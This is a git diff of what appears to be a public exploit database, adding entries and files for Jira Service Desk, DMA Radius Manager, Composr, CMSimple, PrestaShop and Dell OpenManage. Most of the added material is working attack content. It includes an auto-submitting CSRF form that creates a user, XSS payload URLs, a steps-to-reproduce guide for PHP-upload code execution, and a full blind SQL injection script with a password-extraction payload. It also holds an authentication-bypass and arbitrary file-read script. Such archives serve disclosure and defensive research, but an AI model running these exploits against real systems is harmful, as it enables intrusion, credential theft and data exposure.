+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
 
 var buf = new ArrayBuffer(8);
 var f64_buf = new Float64Array(buf);
diff --git a/exploits/multiple/webapps/49748.txt b/exploits/multiple/webapps/49748.txt
new file mode 100644
index 000000000..dfc473c1d
--- /dev/null
+++ b/exploits/multiple/webapps/49748.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS
+# Date: 07 Mar 2020
+# Exploit Author: Captain_hook
+# Vendor Homepage: https://www.atlassian.com/
+# Version: < 4.10.0
+# Tested on: All OS
+# CVE: CVE-2020-14166
+
+Summary:
+
+The /servicedesk/customer/portals resource in Jira Service Desk Server and Data Center before version 4.10.0 allows remote attackers with project administrator privileges to inject arbitrary HTML or JavaScript names via an Cross Site Scripting (XSS) vulnerability by uploading a html file.
+
+Steps to reproduce:
+
+1- reach to this directory http://localhost:port/servicedesk/customer/portals?customize=true
+2- There's a place where the banner can be uploaded when upload wizard popup you can see that the banner image restricted to image format, you can change that type easily
+3- then you can upload HTML and javascript files and hijacking cookies or XSRF tokens.
+
+Original report in bugcrowd:
+
+https://bugcrowd.com/disclosures/61a50171-aa55-4126-b9f4-4e82b4b8c301/unrestricted-file-upload-stored-xss-for-token-hijacking
+Original ticket in atlassian:
+
+https://jira.atlassian.com/browse/JSDSERVER-6895?error=login_required&error_description=Login+required&state=28f8e754-fb05-4f5e-adda-79e252fe2c30
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49752.html b/exploits/multiple/webapps/49752.html
new file mode 100644
index 000000000..7c32c42da
--- /dev/null
+++ b/exploits/multiple/webapps/49752.html
@@ -0,0 +1,60 @@
+# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)
+# Date: April 8, 2021 (04/08/2021)
+# Exploit Author: Issac Briones
+# Vendor Homepage: http://www.dmasoftlab.com/
+# Software Download: https://sourceforge.net/projects/radiusmanager/
+# Version: 4.4.0
+# CVE: CVE-2021-30147
+
+<html>
+	<body>
+		< ! -- Change IP addr to IP addr that RADIUS manager is located -- >
+		<form action="http://192.168.1.2/admin.php?cont=store_user" method="POST">
+			<input type="hidden" name="username" value="csrf_usr" />
+			<input type="hidden" name="enableuser" value="1" />
+			<input type="hidden" name="acctype" value="0" />
+			<input type="hidden" name="password1" value="csrfusr" />
+			<input type="hidden" name="password2" value="csrfusr" />
+			<input type="hidden" name="maccm" value="" />
+			<input type="hidden" name="mac" value="" />
+			<input type="hidden" name="ipmodecpe" value="0" />
+			<input type="hidden" name="simuse" value="1" />
+			<input type="hidden" name="firstname" value="" />
+			<input type="hidden" name="lastname" value="" />
+			<input type="hidden" name="company" value="" />
+			<input type="hidden" name="address" value="" />
+			<input type="hidden" name="city" value="" />
+			<input type="hidden" name="zip" value="" />
+			<input type="hidden" name="country" value="" />
+			<input type="hidden" name="state" value="" />
+			<input type="hidden" name="phone" value="" />
+			<input type="hidden" name="mobile" value="" />
+			<input type="hidden" name="email" value="" />
+			<input type="hidden" name="taxid" value="" />
+			<input type="hidden" name="srvid" value="0" />
+			<input type="hidden" name="downlimit" value="0" />
+			<input type="hidden" name="uplimit" value="0" />
+			<input type="hidden" name="comblimit" value="0" />
+			<input type="hidden" name="expiration" value="2021-04-06" />
+			<input type="hidden" name="uptimelimit" value="00:00:00" />
+			<input type="hidden" name="credits" value="0.00" />
+			<input type="hidden" name="contractid" value="" />
+			<input type="hidden" name="contractvalid" value="" />
+			<input type="hidden" name="gpslat" value="" />
+			<input type="hidden" name="gpslong" value="" />
+			<input type="hidden" name="comment" value="" />
+			<input type="hidden" name="superuser" value="{SUPERUSER}" />
+			<input type="hidden" name="lang" value="English" />
+			<input type="hidden" name="groupid" value="1" />
+			<input type="hidden" name="custattr" value="" />
+			<input type="hidden" name="cnic" value="" />
+			<input type="hidden" name="cnicfile1" value="(binary)" />
+			<input type="hidden" name="cnicfile2" value="(binary)" />
+			<input type="hidden" name="adduser" value="Add user" />
+		</form>
+	<script>
+		document.forms[0].submit();
+	</script>
+	</body>
+
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/49359.py b/exploits/php/webapps/49359.py
index 44c95233d..98c1586ff 100755
--- a/exploits/php/webapps/49359.py
+++ b/exploits/php/webapps/49359.py
@@ -18,8 +18,8 @@ import sys
 
 def usage():
 	if len(sys.argv) != 4:
-	print("Usage: python3 exploit.py [URL]")
-	sys.exit(0)
+		print("Usage: python3 exploit.py [URL]")
+		sys.exit(0)
 
 def copy_cut(url, session_cookie, file_name):
 	headers = {'Cookie': session_cookie,
diff --git a/exploits/php/webapps/49749.txt b/exploits/php/webapps/49749.txt
new file mode 100644
index 000000000..8c3485cd8
--- /dev/null
+++ b/exploits/php/webapps/49749.txt
@@ -0,0 +1,11 @@
+# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
+# Date: 04/06/2021
+# Exploit Author: Orion Hridoy
+# Vendor Homepage: https://compo.sr/
+# Software Link: https://compo.sr/download.htm
+# Version: 10.0.36
+# Tested on: Windows/Linux
+# CVE : CVE-2021-30150
+
+Vulnerable Endpoint:
+https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>
\ No newline at end of file
diff --git a/exploits/php/webapps/49751.txt b/exploits/php/webapps/49751.txt
new file mode 100644
index 000000000..290cc5f78
--- /dev/null
+++ b/exploits/php/webapps/49751.txt
@@ -0,0 +1,16 @@
+# Exploit Title: CMSimple 5.2 - 'External' Stored XSS
+# Date: 2021/04/07
+# Exploit Author: Quadron Research Lab
+# Version: CMSimple 5.2
+# Tested on: Windows 10 x64 HUN/ENG Professional
+# Vendor: https://www.cmsimple.org/en/
+
+[Description]
+The CMSimple 5.2 allow stored XSS via the Settings > CMS > Filebrowser > "External:" input field.
+
+[Attack Vectors]
+The CMSimple cms "Filebrowser" "External:" input field not filter special chars. It is possible to place JavaScript code. 
+The JavaScript code placed here is executed by clicking on the Page or Files tab.
+
+[Proof of Concept]
+https://github.com/Quadron-Research-Lab/CVE/blob/main/CMSimple_5.2_XSS.pdf
\ No newline at end of file
diff --git a/exploits/php/webapps/49753.txt b/exploits/php/webapps/49753.txt
new file mode 100644
index 000000000..0f8b9ca6f
--- /dev/null
+++ b/exploits/php/webapps/49753.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Composr 10.0.36 - Remote Code Execution
+# Date: 04/06/2021
+# Exploit Author: Orion Hridoy
+# Vendor Homepage: https://compo.sr/
+# Software Link: https://compo.sr/download.htm
+# Version: 10.0.36
+# Tested on: Windows/Linux
+# CVE : CVE-2021-30149
+
+A RCE on Composr CMS has been discovered by BugsBD Private LTD. We have a galleries security issue which allows us to upload a PHP file. Whenever we upload an image from galleries, Composr allows us to upload only images. If we tried to upload a PHP file from galleries uploader it will say someone attempting hacking activities. But we have a security issue on the Upload In Bulk section. Whenever we check allowed extension in Upload in bulk function we can see PHP is completely prohibited. But whenever we tamper the request and change the extension we can see it will upload the PHP file without other or server side verification. This allows a user to upload malicious file even when they restricted it.
+
+Steps To Reproduce:
+1. Go to upload galleries.
+2. Upload a image and tamper the request and change the extension from .jpg to .php
+3. It will say hacking attempts, check the allowed extension and you can see it's not accepting PHP extension.
+4. Now go to upload in bulk option.
+5. Upload a image with PHP codes and tamper the request.
+6. Change extension from .jpg to .php
+7. It will get uploaded with the blocked PHP extension.
\ No newline at end of file
diff --git a/exploits/php/webapps/49755.py b/exploits/php/webapps/49755.py
new file mode 100755
index 000000000..1bd5e20d1
--- /dev/null
+++ b/exploits/php/webapps/49755.py
@@ -0,0 +1,128 @@
+# Exploit Title: PrestaShop 1.7.6.7 - 'location' Blind Sql Injection 
+# Date: 2021-04-08
+# Exploit Author: Vanshal Gaur
+# Vendor Homepage: https://www.prestashop.com/
+# Version: 1.7.5.x < 1.7.6.8
+# Tested on: Debian 10 (buster)
+# CVE : CVE-2020-15160
+
+#!/usr/bin/python3
+
+'''
+
+Setup Vulnerable Docker on "localhost:8080":
+
+docker network create prestashop-net
+docker run -ti --name mysql_z --network prestashop-net -e MYSQL_ROOT_PASSWORD=admin -p 3307:3306 -d mysql:5.7
+docker run -ti --name prestashop_z --network prestashop-net -e DB_SERVER=mysql_z -p 8080:80 -d prestashop/prestashop:1.7.6.7
+'''
+
+import requests 
+import sys
+from lxml import html
+import re
+
+
+if len(sys.argv) != 7:
+    print(
+        '''
+        Exploit By: Vanshal Gaur
+        Twitter Handle: @Vanshalg
+
+        Exploit: CVE-2020-15160 PrestaShop blind Sql Injection 1.7.5.0 < 1.7.6.8 
+
+        Before Running the script make sure to login and change "Combinations" to "Simple product" of the product and give that productid. 
+
+        Script will retrive the output of user() function, edit payload in script to retrive other data (Tested With Prestashop 1.7.6.7) 
+        
+        Usage: python3 {} email password localhost 8080 productid /adminpath
+
+               python3 exploit.py "test@gmail.com" "password" localhost 8080 11 /admin123
+        '''.format(sys.argv[0])
+    )
+    sys.exit(1)  
+
+print("Exploiting...(Be Patient)\n")
+email = sys.argv[1]
+password = sys.argv[2]
+target_host = sys.argv[3]
+target_port = sys.argv[4]
+product_id = sys.argv[5]
+admin_path = sys.argv[6]
+target = "http://"+target_host+":"+target_port
+
+# proxies = {"http": "http://127.0.0.1:8081", "https": "http://127.0.0.1:8081"}
+
+s = requests.Session()
+
+def login(s,target,password,email,admin_path):
+    url = target+admin_path+"/index.php"
+    
+    data = {"ajax": "1", "token": '', "controller": "AdminLogin", "submitLogin": "1", "passwd": "TEMP", "email": "test@email.com"}
+    data["passwd"] = password
+    data["email"] = email
+    r = s.post(url, data=data)
+
+login(s,target,password,email,admin_path)
+
+
+token_ext = s.get(target+admin_path+"/")
+token_junk = re.findall("sell/catalog/pro.*_token\=.*",token_ext.text)
+token_spit = re.split("\"",token_junk[0])
+token_2 = re.split("\?",token_spit[0])
+token = token_2[1]
+
+
+def productDetails_formtoken(s,target,product_id,admin_path):
+    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+    
+    q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers)
+    tree = html.fromstring(q.text)
+    output = tree.xpath("//input[contains(@name,'form[_token]')]/@value")
+    form_token = ''.join(output)
+    return form_token
+
+form_token  = productDetails_formtoken(s,target,product_id,admin_path)
+
+
+def productDetails_form_location(s,target,token,product_id,admin_path):
+    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
+    
+    q = s.get(target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token,headers=headers)
+    tree = html.fromstring(q.text)
+    output = tree.xpath("//input[contains(@name,'form[step3][location]')]/@value")
+    form_location = ''.join(output)
+    
+    return form_location
+
+
+
+
+def sqli(s,token,form_token,payload,target,product_id,admin_path):
+    for j in range(32, 126):
+
+        sql_payload = payload.replace("[CHAR]", str(j))
+
+        url = target+admin_path+"/index.php/sell/catalog/products/"+product_id+"?"+token
+        headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
+        data = {"form[step1][name][1]": "Blind Sql Injection @Vanshalg", "form[step1][type_product]": "0", "form[step1][description_short][1]": "<p><span style=\"font-size:10pt;font-style:normal;\">Regular fit, round neckline, short sleeves. Made of extra long staple pima cotton. </span></p>\r\n<p></p>", "form[step1][description][1]": "<p><span style=\"font-size:10pt;font-style:normal;\"><span style=\"font-size:10pt;font-style:normal;\">Symbol of lightness and delicacy, the hummingbird evokes curiosity and joy.</span><span style=\"font-size:10pt;font-style:normal;\"> Studio Design' PolyFaune collection features classic products with colorful patterns, inspired by the traditional japanese origamis. To wear with a chino or jeans. The sublimation textile printing process provides an exceptional color rendering and a color, guaranteed overtime.</span></span></p>", "form[step1][features][0][feature]": "1", "form[step1][features][0][value]": "4", "form[step1][features][0][custom_value][1]": '', "form[step1][features][1][feature]": "2", "form[step1][features][1][value]": "8", "form[step1][features][1][custom_value][1]": '', "form[step1][id_manufacturer]": "1", "show_variations": "0", "form[step6][reference]": "demo_1", "form[step1][qty_0_shortcut]": "0", "form[step1][price_shortcut]": "23.900000", "form[step1][price_ttc_shortcut]": "23.9", "form[step2][id_tax_rules_group]": "1", "form[step1][id_category_default]": "4", "form[step1][categories][tree][]": "2", "form[step1][categories][tree][]": "3", "form[step1][categories][tree][]": "4", "ignore": "4", "form[step1][new_category][name]": '', "form[step1][new_category][id_parent]": "2", "form[step3][qty_0]": "0", "form[step3][minimal_quantity]": "1", "form[step3][location]": "TEST", "form[step3][low_stock_threshold]": '', "form[step3][virtual_product][is_virtual_file]": "0", "form[step3][virtual_product][name]": '', "form[step3][virtual_product][nb_downloadable]": '', "form[step3][virtual_product][expiration_date]": '', "form[step3][virtual_product][nb_days]": "0", "form[step3][pack_stock_type]": "3", "form[step3][attributes]": '', "product_combination_bulk[quantity]": '', "product_combination_bulk[cost_price]": '', "product_combination_bulk[impact_on_weight]": '', "product_combination_bulk[impact_on_price_te]": '', "product_combination_bulk[impact_on_price_ti]": '', "product_combination_bulk[date_availability]": '', "product_combination_bulk[reference]": '', "product_combination_bulk[minimal_quantity]": '', "product_combination_bulk[low_stock_threshold]": '', "product_combination_bulk[_token]": "0Dj8tJ3zd6YfSNgyxRFe6CfNbuMac6mn8rm_Gd52-to", "form[step3][out_of_stock]": "2", "form[step3][available_now][1]": '', "form[step3][available_later][1]": '', "form[step3][available_date]": '', "form[step4][width]": "0", "form[step4][height]": "0", "form[step4][depth]": "0", "form[step4][weight]": "0", "form[step4][additional_delivery_times]": "1", "form[step4][delivery_in_stock][1]": '', "form[step4][delivery_out_stock][1]": '', "form[step4][additional_shipping_cost]": "0.000000", "form[step2][price]": "23.900000", "form[step2][price_ttc]": "23.9", "form[step2][unit_price]": "0.000000", "form[step2][unity]": '', "form[step2][ecotax]": "0.000000", "form[step2][id_tax_rules_group]": "1", "form[step2][wholesale_price]": "0.000000", "form[step2][specific_price][sp_id_shop]": "1", "form[step2][specific_price][sp_id_currency]": '', "form[step2][specific_price][sp_id_country]": '', "form[step2][specific_price][sp_id_group]": '', "form[step2][specific_price][sp_id_product_attribute]": '', "form[step2][specific_price][sp_from]": '', "form[step2][specific_price][sp_to]": '', "form[step2][specific_price][sp_from_quantity]": "1", "form[step2][specific_price][leave_bprice]": "1", "form[step2][specific_price][sp_reduction]": "0.000000", "form[step2][specific_price][sp_reduction_type]": "amount", "form[step2][specific_price][sp_reduction_tax]": "1", "form[step2][specificPricePriority_0]": "id_shop", "form[step2][specificPricePriority_1]": "id_currency", "form[step2][specificPricePriority_2]": "id_country", "form[step2][specificPricePriority_3]": "id_group", "form[step5][meta_title][1]": '', "form[step5][meta_description][1]": '', "form[step5][link_rewrite][1]": "hummingbird-printed-t-shirt", "form[step5][redirect_type]": "301-category", "form[step6][visibility]": "both", "form[step6][display_options][available_for_order]": "1", "form[step6][display_options][show_price]": "1", "form[step6][tags][1]": '', "form[step6][condition]": "new", "form[step6][isbn]": '', "form[step6][ean13]": '', "form[step6][upc]": '', "form[step6][attachment_product][name]": '', "form[step6][attachment_product][description]": '', "form[id_product]": "1", "form[_token]": "4KtBNSbjc--GLbsVr__-wqC5Qw2hQKDXh6zb8vWKBwA", "form[step1][active]": "1"}
+        data["form[_token]"] = form_token
+        data["form[step3][location]"] = sql_payload
+        data["form[id_product]"] = product_id
+        # print(sql_payload)
+        r = s.post(url, headers=headers, data=data)
+        
+        if(productDetails_form_location(s,target,token,product_id,admin_path) == "1"):
+            return j
+    return None
+
+
+for i in range(1,41):
+    payload = "0'|(ascii(substr(user(),%d,1)) regexp [CHAR])#" % i 
+    extracted_char = chr(sqli(s,token,form_token,payload,target,product_id,admin_path))
+    sys.stdout.write(extracted_char)
+    sys.stdout.flush()
+print("\n(+) done!")
+
+#PAYLOAD TO EXTRACT PASSWORD: 
+# payload:  0'|ascii((substr((select passwd from ps_employee),1,1)) regexp [CHAR]#)
\ No newline at end of file
diff --git a/exploits/windows/webapps/49750.py b/exploits/windows/webapps/49750.py
new file mode 100755
index 000000000..3d7f377c9
--- /dev/null
+++ b/exploits/windows/webapps/49750.py
@@ -0,0 +1,117 @@
+# Exploit Title: Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read
+# Date: 4/27/2020
+# Exploit Author: Rhino Security Labs
+# Version: <= 9.4
+# Description: Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station.
+# CVE: CVE-2020-5377
+
+# This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator
+# Proof of concept written by: David Yesland @daveysec with Rhino Security Labs
+# More information can be found here: 
+# A patch for this issue can be found here: 
+# https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability
+
+from xml.sax.saxutils import escape
+import BaseHTTPServer
+import requests
+import thread
+import ssl
+import sys
+import re
+import os
+
+import urllib3
+urllib3.disable_warnings()
+
+if len(sys.argv) < 3:
+	print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>'
+	exit()
+
+#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
+#Also check out https://github.com/hantwister/FakeDellOM
+class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
+	def do_POST(s):
+		data = ''
+		content_len = int(s.headers.getheader('content-length', 0))
+		post_body = s.rfile.read(content_len)
+		s.send_response(200)
+		s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
+		s.end_headers()
+		if "__00omacmd=getuserrightsonly" in post_body:
+			data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>")
+		if "__00omacmd=getaboutinfo " in post_body:
+			data = escape("<ProductVersion>6.0.3</ProductVersion>")
+		if data:
+			requid = re.findall('>uuid:(.*?)<',post_body)[0]
+			s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?>
+							<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule">
+							  <s:Header>
+							    <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
+							    <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo>
+							    <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID>
+							  </s:Header>
+							  <s:Body>
+							    <n1:SendCmd_OUTPUT>
+							      <n1:ResultCode>0</n1:ResultCode>
+							      <n1:ReturnValue>'''+data+'''</n1:ReturnValue>
+							    </n1:SendCmd_OUTPUT>
+							  </s:Body>
+							</s:Envelope>''')
+
+		else:
+			s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''')
+
+	def log_message(self, format, *args):
+		return
+
+createdCert = False
+if not os.path.isfile('./server.pem'):
+	print '[-] No server.pem certifcate file found. Generating one...'
+	os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
+	createdCert = True
+
+def startServer():
+	server_class = BaseHTTPServer.HTTPServer
+	httpd = httpd = server_class(('0.0.0.0', 443), MyHandler)
+	httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
+	httpd.serve_forever()
+
+thread.start_new_thread(startServer,())
+
+myIP = sys.argv[1]
+target = sys.argv[2]
+
+def bypassAuth():
+	values = {}
+	url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
+	data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
+	r = requests.post(url, data=data, verify=False, allow_redirects=False)
+	cookieheader = r.headers['Set-Cookie']
+	sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
+	pathid = re.findall('Path=/(.*?);',cookieheader)
+	values['sessionid'] = sessionid[0]
+	values['pathid'] = pathid[0]
+	return values
+
+ids = bypassAuth()
+sessionid = ids['sessionid']
+pathid = ids['pathid']
+
+print "Session: "+sessionid
+print "VID: "+pathid
+
+def readFile(target,sessid,pathid):
+    while True:
+        file = raw_input('file > ')
+        url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file)
+        cookies = {"JSESSIONID": sessid}
+        r = requests.get(url, cookies=cookies, verify=False)
+        print 'Reading contents of {}:\n{}'.format(file,r.content)
+
+def getPath(path):
+	if path.lower().startswith('c:\\'):
+		path = path[2:]
+        path = path.replace('\\','/')
+        return path
+
+readFile(target,sessionid,pathid)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ecf4932db..175338e5b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18436,8 +18436,9 @@ id,file,description,date,author,type,platform,port
 49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
 49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",2021-03-22,LiquidWorm,remote,hardware,
 49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",2021-03-29,xynmaps,remote,multiple,
-49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
-49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
+49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
+49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
+49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43925,3 +43926,10 @@ id,file,description,date,author,type,platform,port
 49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",2021-04-05,gosh,webapps,windows,
 49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",2021-04-05,gosh,webapps,windows,
 49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion / Path Traversal",2021-04-06,gosh,webapps,ios,
+49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",2021-04-07,Captain_hook,webapps,multiple,
+49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",2021-04-07,"Orion Hridoy",webapps,php,
+49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",2021-04-07,"Rhino Security Labs",webapps,windows,
+49751,exploits/php/webapps/49751.txt,"CMSimple 5.2 - 'External' Stored XSS",2021-04-08,"Quadron Research Lab",webapps,php,
+49752,exploits/multiple/webapps/49752.html,"DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF)",2021-04-08,"Issac Briones",webapps,multiple,
+49753,exploits/php/webapps/49753.txt,"Composr 10.0.36 - Remote Code Execution",2021-04-08,"Orion Hridoy",webapps,php,
+49755,exploits/php/webapps/49755.py,"PrestaShop 1.7.6.7 - 'location' Blind Sql Injection",2021-04-09,"Vanshal Gaur",webapps,php,